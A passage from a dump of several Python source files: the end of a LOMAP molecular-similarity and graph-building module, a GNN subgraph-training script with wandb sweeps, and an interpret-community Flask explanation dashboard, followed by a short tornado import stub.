for atom in mol_j.GetAtoms():
total_charge_mol_j += float(atom.GetProp('_TriposPartialCharge'))
if abs(total_charge_mol_j - total_charge_mol_i) < 1e-3:
scr_ecr = 1.0
else:
scr_ecr = 0.0
return scr_ecr
# Total number of loaded molecules
n = self.nums()
# Looping over all the elements of the selected matrix chunk
for k in range(a, b+1):
# The linear index k is converted into the row and column indexes of
# an hypothetical bidimensional symmetric matrix
i = int(n - 2 - math.floor(math.sqrt(-8*k + 4*n*(n-1)-7)/2.0 - 0.5))
j = int(k + i + 1 - n*(n-1)/2 + (n-i)*((n-i)-1)/2)
#print 'k = %d , i = %d , j = %d' % (k,i,j)
# The Rdkit molecules moli and molj are extracted form the molecule database
moli = self[i].getMolecule()
molj = self[j].getMolecule()
#print 'Processing molecules:\n%s\n%s' % (self[i].getName(),self[j].getName())
# The Electrostatic score rule is calculated
ecr_score = ecr(moli, molj)
# The MCS is computed just if the passed molecules have the same charges
if ecr_score or self.options.ecrscore:
try:
if self.options.verbose == 'pedantic':
logging.info(50*'-')
logging.info('MCS molecules: %s - %s' % (self[i].getName(), self[j].getName()))
# Maximum Common Subgraph (MCS) calculation
logging.info('MCS molecules: %s - %s' % (self[i].getName(), self[j].getName()))
if not fingerprint:
MC = mcs.MCS(moli, molj, options=self.options)
else:
#use the fingerprint as similarity calculation
fps_moli = FingerprintMols.FingerprintMol(moli)
fps_molj = FingerprintMols.FingerprintMol(molj)
fps_tan = DataStructs.FingerprintSimilarity(fps_moli, fps_molj)
except Exception as e:
if self.options.verbose == 'pedantic':
logging.warning('Skipping MCS molecules: %s - %s\t\n\n%s' % (self[i].getName(), self[j].getName(), e))
logging.info(50*'-')
continue
else:
continue
if ecr_score == 0.0 and self.options.ecrscore:
logging.critical('WARNING: Mutation between different charge molecules is enabled')
ecr_score = self.options.ecrscore
# The scoring between the two molecules is performed by using different rules.
# The total score will be the product of all the single rules
if not fingerprint:
tmp_scr = ecr_score * MC.mncar() * MC.mcsr()
strict_scr = tmp_scr * MC.tmcsr(strict_flag=True)
loose_scr = tmp_scr * MC.tmcsr(strict_flag=False)
strict_mtx[k] = strict_scr
loose_mtx[k] = loose_scr
ecr_mtx[k] = ecr_score
else:
#for the fingerprint option, currently just use the identical strict and loose mtx
strict_scr = fps_tan
loose_scr = fps_tan
strict_mtx[k] = strict_scr
loose_mtx[k] = loose_scr
ecr_mtx[k] = ecr_score
logging.info('MCS molecules: %s - %s the strict scr is %s' % (self[i].getName(), self[j].getName(), strict_scr))
return
def build_matrices(self):
"""
This function coordinates the calculation of the similarity score matrices
by distribuiting chunks of the matrices between the allocated processes
"""
logging.info('\nMatrix scoring in progress....\n')
# The similarity score matrices are defined instances of the class SMatrix
# which implements a basic class for symmetric matrices
self.strict_mtx = SMatrix(shape=(self.nums(),))
self.loose_mtx = SMatrix(shape=(self.nums(),))
self.ecr_mtx = SMatrix(shape=(self.nums(),))
# The total number of the effective elements present in the symmetric matrix
l = int(self.nums()*(self.nums() - 1)/2)
if self.options.parallel == 1: # Serial execution
self.compute_mtx(0, l-1, self.strict_mtx, self.loose_mtx, self.ecr_mtx, self.options.fingerprint)
else: # Parallel execution
#add the fingerprint option
fingerprint = self.options.fingerprint
logging.info('Parallel mode is on')
# Number of selected processes
np = self.options.parallel
delta = int(l/np)
rem = l%np
if delta < 1:
kmax = l
else:
kmax = np
proc = []
# Shared memory array used by the different allocated processes
strict_mtx = multiprocessing.Array('d', self.strict_mtx)
loose_mtx = multiprocessing.Array('d', self.loose_mtx)
ecr_mtx = multiprocessing.Array('d', self.ecr_mtx)
# Chopping the indexes ridistribuiting the remainder
for k in range(0, kmax):
spc = delta + int(int(rem/(k+1)) > 0)
if k == 0:
i = 0
else:
i = j + 1
if k!= kmax - 1:
j = i + spc - 1
else:
j = l - 1
#print(i,j)
# Python multiprocessing allocation
p = multiprocessing.Process(target=self.compute_mtx , args=(i, j, strict_mtx, loose_mtx, ecr_mtx, fingerprint,))
p.start()
proc.append(p)
# End parallel execution
for p in proc:
p.join()
# Copying back the results
self.strict_mtx[:] = strict_mtx[:]
self.loose_mtx[:] = loose_mtx[:]
self.ecr_mtx[:] = ecr_mtx[:]
return (self.strict_mtx, self.loose_mtx)
def build_graph(self):
"""
This function coordinates the Graph generation
"""
logging.info('\nGenerating graph in progress....')
# The Graph is build from an instance of the Class GraphGen by passing
# the selected user options
Gr = graphgen.GraphGen(self)
# Writing the results is files
if self.options.output:
try:
Gr.writeGraph()
pickle_f = open(self.options.name+".pickle", "w")
pickle.dump(Gr, pickle_f)
except Exception as e:
logging.error(str(e))
# Handle to the the NetworkX generated graph
self.Graph = Gr.getGraph()
#print self.Graph.nodes(data=True)
# Display the graph by using Matplotlib
if self.options.display:
Gr.draw()
return self.Graph
def write_dic(self):
"""
This function write out a text file with the mapping between the
generated molecule indexes and the corresponding molecule file names
"""
try:
file_txt = open(self.options.name+'.txt', 'w')
except Exception:
raise IOError('It was not possible to write out the mapping file')
file_txt.write('#ID\tFileName\n')
for key in self.dic_mapping:
file_txt.write('%d\t%s\n' % (key, self.dic_mapping[key]))
file_txt.close()
#*************************
# Symmetric Class
#*************************
class SMatrix(np.ndarray):
"""
This class implements a "basic" interface for symmetric matrices
subclassing ndarray. The class interanlly stores a bidimensional
numpy array as a linear array A[k], however the user can still
access to the matrix elements by using a two indeces notation A[i,j]
"""
def __new__(subtype, shape, dtype=float, buffer=None, offset=0, strides=None, order=None):
if len(shape) > 2:
raise ValueError('The matrix shape is greater than two')
elif len(shape) == 2:
if shape[0] != shape[1]:
raise ValueError('The matrix must be a squre matrix')
n = shape[0]
l = int(shape[0]*(shape[0] - 1)/2)
shape = (l,)
obj = np.ndarray.__new__(subtype, shape , dtype, buffer, offset, strides, order)
# Array inizialization
obj = obj*0.0
return obj
def __getitem__(self, *kargs):
"""
This function retrieves the selected elements i,j from the symmetric
matrix A[i,j]
Parameters
----------
*kargs : python tuples
the passed elements i,j
Returns
-------
: float
the selected element extracted from the allocated linear array
"""
if isinstance( kargs[0], int ):
k = kargs[0]
return super(SMatrix, self).__getitem__(k)
if isinstance( kargs[0], slice ):
k = kargs[0]
return super(SMatrix, self).__getitem__(k)
elif len(kargs[0]) > 2:
raise ValueError('Two indices can be addressed')
i = kargs[0][0]
j = kargs[0][1]
if i == j:
return 0.0
# Length of the linear array
l = self.size
# Total number of elements in the corresponding bi-dimensional symmetric matrix
n = int((1+math.sqrt(1+8*l))/2)
if i > n - 1:
raise ValueError('First index out of bound')
if j > n - 1:
raise ValueError('Second index out of bound')
if i < j:
k = int((n*(n-1)/2) - (n-i)*((n-i)-1)/2 + j - i - 1)
else:
k = int((n*(n-1)/2) - (n-j)*((n-j)-1)/2 + i - j - 1)
return super(SMatrix, self).__getitem__(k)
def __setitem__(self, *kargs):
"""
This function set the matrix elements i,j to the passed value
Parameters
----------
*kargs : python tuples
the passed elements i,j, value to set
"""
if isinstance( kargs[0], int ):
k = kargs[0]
value = kargs[1]
return super(SMatrix, self).__setitem__(k,value)
elif isinstance(kargs[0], slice):
start, stop, step = kargs[0].indices(len(self))
value = kargs[1]
return super(SMatrix, self).__setitem__(kargs[0],value)
elif len(kargs[0]) > 2:
raise ValueError('Two indices can be addressed')
# Passed indexes and value to set
i = kargs[0][0]
j = kargs[0][1]
value = kargs[1]
# Length of the linear array
l = self.size
# Total number of elements in the corresponding bi-dimensional symmetric matrix
n = int((1+math.sqrt(1+8*l))/2)
if i > n - 1:
raise ValueError('First index out of bound')
if j > n - 1:
raise ValueError('Second index out of bound')
if i < j:
k = int((n*(n-1)/2) - (n-i)*((n-i)-1)/2 + j - i - 1)
else:
k = int((n*(n-1)/2) - (n-j)*((n-j)-1)/2 + i - j - 1)
super(SMatrix, self).__setitem__(k,value)
def to_numpy_2D_array(self) :
"""
This function returns the symmetric similarity score numpy matrix
generated from the linear array
Returns
-------
np_mat : numpy matrix
the symmetric similarity score numpy matrix built by using the linear
array
"""
# Length of the linear array
l = self.size
# Total number of elements in the corresponding bi-dimensional symmetric matrix
n = int((1+math.sqrt(1+8*l))/2)
np_mat = np.zeros((n,n))
for i in range (0,n):
for j in range(0,n):
np_mat[i,j] = self[i,j]
return np_mat
def mat_size(self) :
"""
This function returns the size of the square similarity score matrix
Returns
-------
n : int
the size of the similarity score matrix
"""
# Length of the linear array
l = self.size
# Total number of elements in the corresponding bi-dimensional symmetric matrix
n = int((1+math.sqrt(1+8*l))/2)
return n
#*************************
# Molecule Class
#*************************
class Molecule(object):
"""
This Class stores the Rdkit molecule objects, their identification number
and the total number of instantiated molecules
"""
# This variable is used to count the current total number of molecules
# The variable is defined as private
__total_molecules = 0
def __init__(self, molecule, mol_id, molname):
"""
Initialization class function
Parameters
----------
molecule : Rdkit molecule object
the molecule
mol_id : int
the molecule identification number
molname : str
the molecule file name
"""
#Check Inputs
if not isinstance(molecule, Chem.rdchem.Mol):
raise ValueError('The passed molecule object is not a RdKit molecule')
if not isinstance(molname, str):
raise ValueError('The passed molecule name must be a string')
# The variable __molecule saves the current RDkit molecule object
# The variable is defined as private
self.__molecule = molecule
# The variable __ID saves the molecule identification number
# The variable is defined as private
self.__ID = mol_id
# The variable __name saves the molecule identification name
# The variable is defined as private
self.__name = molname
def getID(self):
"""
Get the molecule ID number
Returns
-------
: int
the molecule ID number
"""
return self.__ID
def getMolecule(self):
"""
Get the Rdkit molecule object
Returns
-------
mol_copy : Rdkit molecule object
The copy of the RDkit molecule
"""
mol_copy = Chem.Mol(self.__molecule)
return mol_copy
def getName(self):
"""
Get the molecule file name
Returns
-------
: str
the molecule string file name
"""
return self.__name
# Classes used to check some of the passed user options in the main function
# Class used to check the input directory
class check_dir(argparse.Action):
def __call__(self, parser, namespace, directory, option_string=None):
if not os.path.isdir(directory):
raise argparse.ArgumentTypeError('The directory name is not a valid path: %s' % directory)
if os.access(directory, os.R_OK):
setattr(namespace,self.dest, directory)
else:
raise argparse.ArgumentTypeError('The directory name is not readable: %s' % directory)
# Class used to check the parallel, time and max user options
class check_pos(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if value < 1:
raise argparse.ArgumentTypeError('%s is not a positive integer number' % value)
setattr(namespace, self.dest, value)
# Class used to check the cutoff user option
class check_cutoff(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if not isinstance(value, float) or value < 0.0:
raise argparse.ArgumentTypeError('%s is not a positive real number' % value)
setattr(namespace, self.dest, value)
# Class used to check the handicap user option
class check_ecrscore(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if not isinstance(value, float) or value < 0.0 or value > 1.0:
raise argparse.ArgumentTypeError('%s is not a real number in the range [0.0, 1.0]' % value)
setattr(namespace, self.dest, value)
def startup():
# Options and arguments passed by the user
ops= parser.parse_args()
# Molecule DataBase initialized with the passed user options
db_mol = DBMolecules(ops.directory, ops.parallel, ops.verbose, ops.time, ops.ecrscore,
ops.output, ops.name, ops.display, ops.max, ops.cutoff, ops.radial, ops.hub, ops.fast)
# Similarity score linear array generation
strict, loose = db_mol.build_matrices()
# Get the 2D numpy matrices
# strict.to_numpy_2D_array()
# loose.to_numpy_2D_array()
# Graph generation based on the similarity score matrix
nx_graph = db_mol.build_graph()
# print nx_graph.nodes(data=True)
# print nx_graph.edges(data=True)
# Command line user interface
#----------------------------------------------------------------
parser = argparse.ArgumentParser(description='Lead Optimization Mapper 2. A program to plan alchemical relative binding affinity calculations', prog='LOMAPv1.0')
parser.add_argument('directory', action=check_dir,\
help='The mol2 file directory')
# parser.add_argument('-t', '--time', default=20, action=check_int,type=int,\
# help='Set the maximum time in seconds to perform the mcs search between pair of molecules')
parser.add_argument('-p', '--parallel', default=1, action=check_pos, type=int,\
help='Set the parallel mode. If an integer number N is specified, N processes will be executed to build the similarity matrices')
parser.add_argument('-v', '--verbose', default='info', type=str,\
choices=['off', 'info', 'pedantic'], help='verbose mode selection')
mcs_group = parser.add_argument_group('MCS setting')
mcs_group.add_argument('-t', '--time', default=20, action=check_pos, type=int,\
help='Set the maximum time in seconds to perform the mcs search between pair of molecules')
mcs_group.add_argument('-e', '--ecrscore', default=0.0, action=check_ecrscore, type=float,\
help='If different from 0.0 the value is use to set the electrostatic score between two molecules with different charges')
out_group = parser.add_argument_group('Output setting')
out_group.add_argument('-o', '--output', default=True, action='store_true',\
help='Generates output files')
out_group.add_argument('-n', '--name', type=str, default='out',\
help='File name prefix used to generate the output files')
parser.add_argument('-d', '--display', default=False, action='store_true',\
help='Display the generated graph by using Matplotlib')
graph_group = parser.add_argument_group('Graph setting')
graph_group.add_argument('-m', '--max', default=6, action=check_pos ,type=int,\
help='The maximum distance used to cluster the graph nodes')
graph_group.add_argument('-c', '--cutoff', default=0.4 , action=check_cutoff, type=float,\
help='The Minimum Similariry Score (MSS) used to build the graph')
graph_group.add_argument('-r', '--radial', default=False, action='store_true',\
help='Using the radial option to build the graph')
graph_group.add_argument('-b', '--hub', default= None , type=str,\
help='Using a radial graph approach with a manually specified hub compound')
graph_group.add_argument('-f', '--fingerprint', default=False, action='store_true',\
help='Using the fingerprint option to build similarity matrices')
graph_group.add_argument('-a', '--fast', default=False, action='store_true',\
help='Using the fast graphing when the lead compound is specificed')
#------------------------------------------------------------------
# Main function
if ("__main__" == __name__) :
startup()
|
main.py | import argparse
import multiprocessing as mp
import os
import random
import numpy as np
import torch
import torch.optim as optim
import wandb
from ogb.graphproppred import Evaluator
# noinspection PyUnresolvedReferences
from data import SubgraphData
from utils import get_data, get_model, SimpleEvaluator, NonBinaryEvaluator, Evaluator
torch.set_num_threads(1)
def train(model, device, loader, optimizer, criterion, epoch, fold_idx):
model.train()
for step, batch in enumerate(loader):
batch = batch.to(device)
if batch.x.shape[0] == 1 or batch.batch[-1] == 0:
pass
else:
pred = model(batch)
optimizer.zero_grad()
# ignore nan targets (unlabeled) when computing training loss.
is_labeled = batch.y == batch.y
y = batch.y.view(pred.shape).to(torch.float32) if pred.size(-1) == 1 else batch.y
loss = criterion(pred.to(torch.float32)[is_labeled], y[is_labeled])
wandb.log({f'Loss/train': loss.item()})
loss.backward()
optimizer.step()
def eval(model, device, loader, evaluator, voting_times=1):
model.eval()
all_y_pred = []
for i in range(voting_times):
y_true = []
y_pred = []
for step, batch in enumerate(loader):
batch = batch.to(device)
if batch.x.shape[0] == 1:
pass
else:
with torch.no_grad():
pred = model(batch)
y = batch.y.view(pred.shape) if pred.size(-1) == 1 else batch.y
y_true.append(y.detach().cpu())
y_pred.append(pred.detach().cpu())
all_y_pred.append(torch.cat(y_pred, dim=0).unsqueeze(-1).numpy())
y_true = torch.cat(y_true, dim=0).numpy()
input_dict = {"y_true": y_true, "y_pred": all_y_pred}
return evaluator.eval(input_dict)
def reset_wandb_env():
exclude = {
"WANDB_PROJECT",
"WANDB_ENTITY",
"WANDB_API_KEY",
}
for k, v in os.environ.items():
if k.startswith("WANDB_") and k not in exclude:
del os.environ[k]
def run(args, device, fold_idx, sweep_run_name, sweep_id, results_queue):
# set seed
torch.manual_seed(args.seed)
np.random.seed(args.seed)
random.seed(args.seed)
reset_wandb_env()
run_name = "{}-{}".format(sweep_run_name, fold_idx)
run = wandb.init(
group=sweep_id,
job_type=sweep_run_name,
name=run_name,
config=args,
)
train_loader, train_loader_eval, valid_loader, test_loader, attributes = get_data(args, fold_idx)
in_dim, out_dim, task_type, eval_metric = attributes
if 'ogb' in args.dataset:
evaluator = Evaluator(args.dataset)
else:
evaluator = SimpleEvaluator(task_type) if args.dataset != "IMDB-MULTI" \
and args.dataset != "CSL" else NonBinaryEvaluator(out_dim)
model = get_model(args, in_dim, out_dim, device)
optimizer = optim.Adam(model.parameters(), lr=args.learning_rate)
if 'ZINC' in args.dataset:
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=args.patience)
elif 'ogb' in args.dataset:
scheduler = None
else:
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=args.decay_step, gamma=args.decay_rate)
if "classification" in task_type:
criterion = torch.nn.BCEWithLogitsLoss() if args.dataset != "IMDB-MULTI" \
and args.dataset != "CSL" else torch.nn.CrossEntropyLoss()
else:
criterion = torch.nn.L1Loss()
# If sampling, perform majority voting on the outputs of 5 independent samples
voting_times = 5 if args.fraction != 1. else 1
train_curve = []
valid_curve = []
test_curve = []
for epoch in range(1, args.epochs + 1):
train(model, device, train_loader, optimizer, criterion, epoch=epoch, fold_idx=fold_idx)
# Only valid_perf is used for TUD
train_perf = eval(model, device, train_loader_eval, evaluator, voting_times) \
if 'ogb' in args.dataset else {eval_metric: 300.}
valid_perf = eval(model, device, valid_loader, evaluator, voting_times)
test_perf = eval(model, device, test_loader, evaluator, voting_times) \
if 'ogb' in args.dataset or 'ZINC' in args.dataset else {eval_metric: 300.}
if scheduler is not None:
if 'ZINC' in args.dataset:
scheduler.step(valid_perf[eval_metric])
if optimizer.param_groups[0]['lr'] < 0.00001:
break
else:
scheduler.step()
train_curve.append(train_perf[eval_metric])
valid_curve.append(valid_perf[eval_metric])
test_curve.append(test_perf[eval_metric])
run.log(
{
f'Metric/train': train_perf[eval_metric],
f'Metric/valid': valid_perf[eval_metric],
f'Metric/test': test_perf[eval_metric]
}
)
wandb.join()
results_queue.put((train_curve, valid_curve, test_curve))
return
def main():
# Training settings
parser = argparse.ArgumentParser(description='GNN baselines with Pytorch Geometrics')
parser.add_argument('--device', type=int, default=0,
help='which gpu to use if any (default: 0)')
parser.add_argument('--gnn_type', type=str,
help='Type of convolution {gin, originalgin, zincgin, graphconv}')
parser.add_argument('--random_ratio', type=float, default=0.,
help='Number of random features, > 0 only for RNI')
parser.add_argument('--model', type=str,
help='Type of model {deepsets, dss, gnn}')
parser.add_argument('--drop_ratio', type=float, default=0.5,
help='dropout ratio (default: 0.5)')
parser.add_argument('--num_layer', type=int, default=5,
help='number of GNN message passing layers (default: 5)')
parser.add_argument('--channels', type=str,
help='String with dimension of each DS layer, separated by "-"'
'(considered only if args.model is deepsets)')
parser.add_argument('--emb_dim', type=int, default=300,
help='dimensionality of hidden units in GNNs (default: 300)')
parser.add_argument('--jk', type=str, default="last",
help='JK strategy, either last or concat (default: last)')
parser.add_argument('--batch_size', type=int, default=32,
help='input batch size for training (default: 32)')
parser.add_argument('--learning_rate', type=float, default=0.01,
help='learning rate for training (default: 0.01)')
parser.add_argument('--decay_rate', type=float, default=0.5,
help='decay rate for training (default: 0.5)')
parser.add_argument('--decay_step', type=int, default=50,
help='decay step for training (default: 50)')
parser.add_argument('--epochs', type=int, default=100,
help='number of epochs to train (default: 100)')
parser.add_argument('--num_workers', type=int, default=0,
help='number of workers (default: 0)')
parser.add_argument('--dataset', type=str, default="ogbg-molhiv",
help='dataset name (default: ogbg-molhiv)')
parser.add_argument('--policy', type=str, default="edge_deleted",
help='Subgraph selection policy in {edge_deleted, node_deleted, ego_nets}'
' (default: edge_deleted)')
parser.add_argument('--num_hops', type=int, default=2,
help='Depth of the ego net if policy is ego_nets (default: 2)')
parser.add_argument('--seed', type=int, default=0,
help='random seed (default: 0)')
parser.add_argument('--fraction', type=float, default=1.0,
help='Fraction of subsampled subgraphs (1.0 means full bag aka no sampling)')
parser.add_argument('--patience', type=int, default=20,
help='patience (default: 20)')
parser.add_argument('--test', action='store_true',
help='quick test')
parser.add_argument('--filename', type=str, default="",
help='filename to output result (default: )')
args = parser.parse_args()
args.channels = list(map(int, args.channels.split("-")))
device = torch.device("cuda:" + str(args.device)) if torch.cuda.is_available() else torch.device("cpu")
# set seed
torch.manual_seed(args.seed)
np.random.seed(args.seed)
random.seed(args.seed)
mp.set_start_method('spawn')
sweep_run = wandb.init()
sweep_id = sweep_run.sweep_id or "unknown"
sweep_url = sweep_run.get_sweep_url()
project_url = sweep_run.get_project_url()
sweep_group_url = "{}/groups/{}".format(project_url, sweep_id)
sweep_run.notes = sweep_group_url
sweep_run.save()
sweep_run_name = sweep_run.name or sweep_run.id or "unknown"
if 'ogb' in args.dataset or 'ZINC' in args.dataset:
n_folds = 1
elif 'CSL' in args.dataset:
n_folds = 5
else:
n_folds = 10
# number of processes to run in parallel
# TODO: make it dynamic
if n_folds > 1 and 'REDDIT' not in args.dataset:
if args.dataset == 'PROTEINS':
num_proc = 2
else:
num_proc = 3 if args.batch_size == 128 and args.dataset != 'MUTAG' and args.dataset != 'PTC' else 5
else:
num_proc = 1
if args.dataset in ['CEXP', 'EXP']:
num_proc = 2
if 'IMDB' in args.dataset and args.policy == 'edge_deleted':
num_proc = 1
num_free = num_proc
results_queue = mp.Queue()
curve_folds = []
fold_idx = 0
if args.test:
run(args, device, fold_idx, sweep_run_name, sweep_id, results_queue)
exit()
while len(curve_folds) < n_folds:
if num_free > 0 and fold_idx < n_folds:
p = mp.Process(
target=run, args=(args, device, fold_idx, sweep_run_name, sweep_id, results_queue)
)
fold_idx += 1
num_free -= 1
p.start()
else:
curve_folds.append(results_queue.get())
num_free += 1
train_curve_folds = np.array([l[0] for l in curve_folds])
valid_curve_folds = np.array([l[1] for l in curve_folds])
test_curve_folds = np.array([l[2] for l in curve_folds])
# compute aggregated curves across folds
train_curve = np.mean(train_curve_folds, 0)
train_accs_std = np.std(train_curve_folds, 0)
valid_curve = np.mean(valid_curve_folds, 0)
valid_accs_std = np.std(valid_curve_folds, 0)
test_curve = np.mean(test_curve_folds, 0)
test_accs_std = np.std(test_curve_folds, 0)
task_type = 'classification' if args.dataset != 'ZINC' else 'regression'
if 'classification' in task_type:
best_val_epoch = np.argmax(valid_curve)
best_train = max(train_curve)
else:
best_val_epoch = len(valid_curve) - 1
best_train = min(train_curve)
sweep_run.summary[f'Metric/train_mean'] = train_curve[best_val_epoch]
sweep_run.summary[f'Metric/valid_mean'] = valid_curve[best_val_epoch]
sweep_run.summary[f'Metric/test_mean'] = test_curve[best_val_epoch]
sweep_run.summary[f'Metric/train_std'] = train_accs_std[best_val_epoch]
sweep_run.summary[f'Metric/valid_std'] = valid_accs_std[best_val_epoch]
sweep_run.summary[f'Metric/test_std'] = test_accs_std[best_val_epoch]
if not args.filename == '':
torch.save({'Val': valid_curve[best_val_epoch], 'Val std': valid_accs_std[best_val_epoch],
'Test': test_curve[best_val_epoch], 'Test std': test_accs_std[best_val_epoch],
'Train': train_curve[best_val_epoch], 'Train std': train_accs_std[best_val_epoch],
'BestTrain': best_train}, args.filename)
wandb.join()
if __name__ == "__main__":
main()
|
explanation_dashboard.py | from flask import Flask, request
from flask_cors import CORS
from jinja2 import Environment, PackageLoader
from IPython.display import display, HTML
from interpret.utils.environment import EnvironmentDetector, is_cloud_env
import threading
import socket
import requests
import re
import os
import json
import atexit
from .explanation_dashboard_input import ExplanationDashboardInput
from ._internal.constants import DatabricksInterfaceConstants
try:
from gevent.pywsgi import WSGIServer
except ModuleNotFoundError:
raise RuntimeError("Error: gevent package is missing, please run 'conda install gevent' or"
"'pip install gevent' or 'pip install interpret-community[visualization]'")
class ExplanationDashboard:
"""Explanation Dashboard Class.
:param explanation: An object that represents an explanation.
:type explanation: ExplanationMixin
:param model: An object that represents a model. It is assumed that for the classification case
it has a method of predict_proba() returning the prediction probabilities for each
class and for the regression case a method of predict() returning the prediction value.
:type model: object
:param dataset: A matrix of feature vector examples (# examples x # features), the same samples
used to build the explanation. Overwrites any existing dataset on the explanation object. Must have fewer than
10000 rows and fewer than 1000 columns.
:type dataset: numpy.array or list[][]
:param datasetX: Alias of the dataset parameter. If dataset is passed, this will have no effect. Must have fewer
than 10000 rows and fewer than 1000 columns.
:type datasetX: numpy.array or list[][]
:param true_y: The true labels for the provided dataset. Overwrites any existing dataset on the
explanation object.
:type true_y: numpy.array or list[]
:param classes: The class names.
:type classes: numpy.array or list[]
:param features: Feature names.
:type features: numpy.array or list[]
:param port: The port to use on locally hosted service.
:type port: int
:param use_cdn: Whether to load latest dashboard script from cdn, fall back to local script if False.
:type use_cdn: bool
"""
service = None
explanations = {}
model_count = 0
using_fallback = False
_cdn_path = "v0.3.js"
_dashboard_js = None
env = Environment(loader=PackageLoader(__name__, 'templates'))
default_template = env.get_template("inlineDashboard.html")
class DashboardService:
app = Flask(__name__)
CORS(app)
def __init__(self, port):
self.port = port
self.ip = 'localhost'
self.env = "local"
self.use_cdn = True
if self.port is None:
# Try 100 different ports
for port in range(5000, 5100):
available = ExplanationDashboard.DashboardService._local_port_available(self.ip, port, rais=False)
if available:
self.port = port
return
error_message = """Ports 5000 to 5100 not available.
Please specify an open port for use via the 'port' parameter"""
raise RuntimeError(
error_message.format(port)
)
else:
ExplanationDashboard.DashboardService._local_port_available(self.ip, self.port)
def run(self):
class devnull:
write = lambda _: None # noqa: E731
server = WSGIServer((self.ip, self.port), self.app, log=devnull)
self.app.config["server"] = server
server.serve_forever()
# Closes server on program exit, including freeing all sockets
def closeserver():
server.stop()
atexit.register(closeserver)
def get_base_url(self):
env = EnvironmentDetector()
detected_envs = env.detect()
in_cloud_env = is_cloud_env(detected_envs)
# First handle known cloud environments
nbvm_file_path = "/mnt/azmnt/.nbvm"
if not (os.path.exists(nbvm_file_path) and os.path.isfile(nbvm_file_path)):
if not in_cloud_env:
return "http://{0}:{1}".format(
self.ip,
self.port)
# all non-specified cloud environments are not handled
self.env = "cloud"
return None
self.env = "cloud"
# regex to find items of the form key=value where value will be part of a url
# the keys of interest to us are "instance" and domainsuffix"
envre = re.compile(r'''^([^\s=]+)=(?:[\s"']*)(.+?)(?:[\s"']*)$''')
result = {}
with open(nbvm_file_path) as nbvm_variables:
for line in nbvm_variables:
match = envre.match(line)
if match is not None:
result[match.group(1)] = match.group(2)
if "instance" not in result or "domainsuffix" not in result:
return None
self.env = "azure"
instance_name = result["instance"]
domain_suffix = result["domainsuffix"]
return "https://{}-{}.{}".format(instance_name, self.port, domain_suffix)
@staticmethod
def _local_port_available(ip, port, rais=True):
"""
Borrowed from:
https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux
"""
try:
backlog = 5
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((ip, port))
sock.listen(backlog)
sock.close()
except socket.error: # pragma: no cover
if rais:
error_message = """Port {0} is not available.
Please specify another port for use via the 'port' parameter"""
raise RuntimeError(
error_message.format(port)
)
else:
return False
return True
@app.route('/')
def hello():
return "No global list view supported at this time."
@app.route('/<id>')
def explanation_visual(id):
if id in ExplanationDashboard.explanations:
return generate_inline_html(ExplanationDashboard.explanations[id], None)
else:
return "Unknown model id."
@app.route('/<id>/predict', methods=['POST'])
def predict(id):
data = request.get_json(force=True)
if id in ExplanationDashboard.explanations:
return ExplanationDashboard.explanations[id].on_predict(data)
def __init__(self, explanation, model=None, *, dataset=None,
true_y=None, classes=None, features=None, port=None, use_cdn=True,
datasetX=None, trueY=None, locale=None):
# support legacy kwarg names
if dataset is None and datasetX is not None:
dataset = datasetX
if true_y is None and trueY is not None:
true_y = trueY
self._initialize_js(use_cdn)
predict_url = None
local_url = None
if not ExplanationDashboard.service:
try:
ExplanationDashboard.service = ExplanationDashboard.DashboardService(port)
self._thread = threading.Thread(target=ExplanationDashboard.service.run, daemon=True)
self._thread.start()
except Exception as e:
ExplanationDashboard.service = None
raise e
ExplanationDashboard.service.use_cdn = use_cdn
ExplanationDashboard.model_count += 1
base_url = ExplanationDashboard.service.get_base_url()
if base_url is not None:
predict_url = "{0}/{1}/predict".format(
base_url,
str(ExplanationDashboard.model_count))
local_url = "{0}/{1}".format(
base_url,
str(ExplanationDashboard.model_count))
explanation_input =\
ExplanationDashboardInput(explanation, model, dataset, true_y, classes, features, predict_url, locale)
# Due to auth, predict is only available in separate tab in cloud after login
if ExplanationDashboard.service.env == "local":
explanation_input.enable_predict_url()
html = generate_inline_html(explanation_input, local_url)
if ExplanationDashboard.service.env == "azure":
explanation_input.enable_predict_url()
ExplanationDashboard.explanations[str(ExplanationDashboard.model_count)] = explanation_input
if "DATABRICKS_RUNTIME_VERSION" in os.environ:
_render_databricks(html)
else:
display(HTML(html))
def _initialize_js(self, use_cdn):
if (ExplanationDashboard._dashboard_js is None):
if (use_cdn):
try:
url = 'https://interpret-cdn.azureedge.net/{0}'.format(ExplanationDashboard._cdn_path)
r = requests.get(url)
if not r.ok:
ExplanationDashboard.using_fallback = True
self._load_local_js()
r.encoding = "utf-8"
ExplanationDashboard._dashboard_js = r.text
except Exception:
ExplanationDashboard.using_fallback = True
self._load_local_js()
else:
self._load_local_js()
def _load_local_js(self):
script_path = os.path.dirname(os.path.abspath(__file__))
js_path = os.path.join(script_path, "static", "index.js")
with open(js_path, "r", encoding="utf-8") as f:
ExplanationDashboard._dashboard_js = f.read()
def generate_inline_html(explanation_input_object, local_url):
explanation_input = json.dumps(explanation_input_object.dashboard_input)
return ExplanationDashboard.default_template.render(explanation=explanation_input,
main_js=ExplanationDashboard._dashboard_js,
app_id='app_123',
using_fallback=ExplanationDashboard.using_fallback,
local_url=local_url,
has_local_url=local_url is not None)
# NOTE: Code mostly derived from Plotly's databricks render as linked below:
# https://github.com/plotly/plotly.py/blob/01a78d3fdac14848affcd33ddc4f9ec72d475232/packages/python/plotly/plotly/io/_base_renderers.py
def _render_databricks(html): # pragma: no cover
import inspect
if _render_databricks.displayHTML is None:
found = False
for frame in inspect.getouterframes(inspect.currentframe()):
global_names = set(frame.frame.f_globals)
target_names = {DatabricksInterfaceConstants.DISPLAY_HTML,
DatabricksInterfaceConstants.DISPLAY,
DatabricksInterfaceConstants.SPARK}
if target_names.issubset(global_names):
_render_databricks.displayHTML = frame.frame.f_globals[
DatabricksInterfaceConstants.DISPLAY_HTML]
found = True
break
if not found:
msg = "Could not find databrick's displayHTML function"
raise RuntimeError(msg)
_render_databricks.displayHTML(html)
_render_databricks.displayHTML = None
|
base_socketsM.py | import tornado.websocket
import json
import definitions
